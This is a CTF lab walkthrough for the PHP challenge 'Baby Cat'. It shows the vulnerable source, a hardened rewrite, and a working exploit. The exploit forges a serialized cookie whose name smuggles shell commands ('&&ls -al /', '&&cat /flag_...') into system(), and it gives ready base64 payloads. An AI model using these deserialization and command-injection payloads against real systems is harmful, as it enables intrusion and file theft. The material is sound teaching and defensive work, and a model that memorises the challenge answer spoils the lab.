Simple Web 0x17(Lab - Baby Cat)
tags: NTUSTWS, CTF, Web
Challenge: http://h4ck3r.quest:8601/
Background
Source code
:::spoiler code
```php
<?php
isset($_GET['source']) && die(!show_source(__FILE__));

class Cat
{
    public $name = '(guest cat)';

    function __construct($name)
    {
        $this->name = $name;
    }

    // Runs automatically when unserialize() rebuilds a Cat; $this->name is
    // interpolated unescaped into a shell command.
    function __wakeup()
    {
        echo "<pre>";
        system("cowsay 'Welcome back, $this->name'");
        echo "</pre>";
    }
}

if (!isset($_COOKIE['cat_session'])) {
    $cat = new Cat("cat_" . rand(0, 0xffff));
    setcookie('cat_session', base64_encode(serialize($cat)));
} else {
    // The cookie is client-controlled and unsigned, so any Cat object goes in here.
    $cat = unserialize(base64_decode($_COOKIE['cat_session']));
}
?>
<p>Hello, <?= $cat->name ?>.</p>
<a href="/?source">source code</a>
```
:::
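For comparison, here is a hardened rewrite of the same cookie handling. This is an added example, not the challenge's code: it stores the cat state as JSON (so no class is ever instantiated from the cookie), signs the cookie with an HMAC so it cannot be forged, and passes the name to `cowsay` through `escapeshellarg()` so shell metacharacters stay data. It assumes a server-side secret in the hypothetical environment variable `CAT_SESSION_KEY`.

```php
<?php
// Added example: hardened version of the Baby Cat cookie handling.
// Not the challenge's code. Assumes CAT_SESSION_KEY (hypothetical name) is a
// server-side secret supplied via the environment, and that cowsay is installed.

declare(strict_types=1);

const COOKIE_NAME = 'cat_session';

/** Load the HMAC key; refuse to run without one rather than fall back to a default. */
function session_key(): string
{
    $key = getenv('CAT_SESSION_KEY');   // assumed deployment setting
    if ($key === false || strlen($key) < 32) {
        throw new RuntimeException('CAT_SESSION_KEY must be set to at least 32 bytes');
    }
    return $key;
}

/** Encode the cat state as JSON (plain data, no classes) and append an HMAC tag. */
function encode_session(array $state, string $key): string
{
    $payload = base64_encode(json_encode($state, JSON_THROW_ON_ERROR));
    $tag     = hash_hmac('sha256', $payload, $key);
    return $payload . '.' . $tag;
}

/** Verify the tag in constant time, then decode. Returns null on any failure. */
function decode_session(string $cookie, string $key): ?array
{
    $parts = explode('.', $cookie, 2);
    if (count($parts) !== 2) {
        return null;
    }
    [$payload, $tag] = $parts;
    $expected = hash_hmac('sha256', $payload, $key);
    if (!hash_equals($expected, $tag)) {
        return null;                    // forged or modified cookie
    }
    $raw = base64_decode($payload, true);
    if ($raw === false) {
        return null;
    }
    // json_decode() only ever yields arrays/scalars here; unlike unserialize()
    // it cannot instantiate a class or trigger __wakeup().
    $state = json_decode($raw, true);
    if (!is_array($state) || !isset($state['name']) || !is_string($state['name'])) {
        return null;
    }
    return $state;
}

/** Build the cowsay command with the greeting as a single quoted argument. */
function greeting_command(string $name): string
{
    // escapeshellarg() wraps the value in single quotes and escapes embedded
    // quotes, so '&&' or '||' inside $name never reach the shell as syntax.
    return 'cowsay ' . escapeshellarg('Welcome back, ' . $name);
}

$key   = session_key();
$state = isset($_COOKIE[COOKIE_NAME]) ? decode_session($_COOKIE[COOKIE_NAME], $key) : null;

if ($state === null) {
    // Missing, forged, or malformed cookie: issue a fresh guest identity.
    $state = ['name' => 'cat_' . random_int(0, 0xffff)];
    setcookie(COOKIE_NAME, encode_session($state, $key), ['httponly' => true, 'samesite' => 'Lax']);
} else {
    echo '<pre>';
    system(greeting_command($state['name']));
    echo '</pre>';
}
?>
<p>Hello, <?= htmlspecialchars($state['name'], ENT_QUOTES, 'UTF-8') ?>.</p>
```

If `serialize()` must be kept for some reason, the minimal change is `unserialize($data, ['allowed_classes' => false])`, which turns any object in the payload into `__PHP_Incomplete_Class` so no `__wakeup()` or `__destruct()` runs; the HMAC on its own would also stop cookie forgery. The `escapeshellarg()` change is independent of both and fixes the actual command-injection sink, which is why all three appear together here.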
Exploit - deserialize
- Use psysh to test payload

  On the local side, if you haven't installed `cowsay`, the payload should be `'||ls -al'`.

  ```
  $ ./psysh
  > system("cowsay 'Welcome back, '||pwd''");
  sh: 1: cowsay: not found
  /home/sbk6401
  = "/home/sbk6401"
  ```
- Construct testing case

  ```
  $ ./psysh
  > class Cat{
  .   public $name = '(guest cat)';
  .   function __construct($name){$this->name = $name;}
  .   function __wakeup(){system("cowsay 'Welcome back, $this->name'");}}
  > $cat = new Cat("'&&ls -al /'")
  = Cat {#2785
      +name: "'&&ls -al /'",
    }
  > base64_encode(serialize($cat))
  = "TzozOiJDYXQiOjE6e3M6NDoibmFtZSI7czoxMjoiJyYmbHMgLWFsIC8nIjt9"
  ```

  Then change `cat_session` to `TzozOiJDYXQiOjE6e3M6NDoibmFtZSI7czoxMjoiJyYmbHMgLWFsIC8nIjt9` and we'll get the response.

- Get flag
  ```
  > $cat = new Cat("'&&cat /flag_5fb2acebf1d0c558'")
  = Cat {#2789
      +name: "'&&cat /flag_5fb2acebf1d0c558'",
    }
  > base64_encode(serialize($cat))
  = "TzozOiJDYXQiOjE6e3M6NDoibmFtZSI7czozMDoiJyYmY2F0IC9mbGFnXzVmYjJhY2ViZjFkMGM1NTgnIjt9"
  ```

  Again, modify `cat_session` to `TzozOiJDYXQiOjE6e3M6NDoibmFtZSI7czozMDoiJyYmY2F0IC9mbGFnXzVmYjJhY2ViZjFkMGM1NTgnIjt9`, then we'll get the flag.